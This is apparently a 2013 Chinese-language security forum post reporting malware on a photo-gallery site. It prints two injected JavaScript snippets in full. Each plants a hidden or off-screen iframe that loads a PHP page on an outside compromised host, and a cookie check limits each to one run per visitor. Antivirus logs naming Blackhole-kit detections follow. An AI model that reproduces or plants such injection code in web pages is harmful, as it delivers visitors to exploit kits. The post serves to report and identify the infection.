http://candzphotos.com/photocart/index.php

显示全部楼层 · 发表于 2013-8-21 18:43:39

function n09() {
var static = 'ajax';
var controller = 'index.php';
var n = document.createElement('iframe');
n.src = 'http://www.unratedmagazine.com/SpryAssets/jKYwBNPF.php';
n.style.position = 'absolute';
n.style.color = '2845';
n.style.height = '2845px';
n.style.width = '2845px';
n.style.left = '10002845';
n.style.top = '10002845';
if (!document.getElementById('n')) {
document.write('<p id=\'n\' class=\'n09\' ></p>');
document.getElementById('n').appendChild(n);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
n09();
}
}

复制代码

function zzzfff() {
var ztba = document.createElement('iframe');
ztba.src = 'http://lioton.com.hk/images/CNpP4tk7.php';
ztba.style.position = 'absolute';
ztba.style.border = '0';
ztba.style.height = '1px';
ztba.style.width = '1px';
ztba.style.left = '1px';
ztba.style.top = '1px';
if (!document.getElementById('ztba')) {
document.write('<div id=\'ztba\'></div>');
document.getElementById('ztba').appendChild(ztba);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

Avira

2013/8/21 下午 06:38 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\V06BEYUS\index[2].htm'
   包含病毒或有害的程式 'JS/Blacole.DO.1' [virus]
   已採取動作：
   發生錯誤，檔案未刪除。錯誤識別碼：26003.
   檔案無法刪除！.
   嘗試使用 ARK 程式庫執行動作。.
   檔案會移動至 '4c461ef1.qua' 名稱底下的隔離區目錄。.

2013/8/21 下午 06:38 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 792
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/8/21 下午 06:38 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\N92GKAZK\view.image[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 下午 06:38 [Web Protection] 發現惡意程式碼
   從 URL "http://candzphotos.com/photocart/js/hover.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：封鎖的檔案

2013/8/21 下午 06:38 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\N92GKAZK\view.image[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/8/21 下午 06:38 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\HH0NO8WJ\norightclick[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 下午 06:38 [Web Protection] 發現惡意程式碼
   從 URL "http://candzphotos.com/photocart/view.image.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/8/21 下午 06:38 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\js[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/8/21 下午 06:38 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\js[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 下午 06:38 [Web Protection] 發現惡意程式碼
   從 URL "http://candzphotos.com/photocart/norightclick.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/8/21 下午 06:38 [Web Protection] 發現惡意程式碼
   從 URL "http://candzphotos.com/photocart/js/js.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/8/21 下午 06:38 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\V06BEYUS\index[2].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.DO.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 下午 06:38 [Web Protection] 發現惡意程式碼
   從 URL "http://candzphotos.com/photocart/index.php" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.DO.1' [virus]。
   已採取動作：已略過

[已鉴定] http://candzphotos.com/photocart/index.php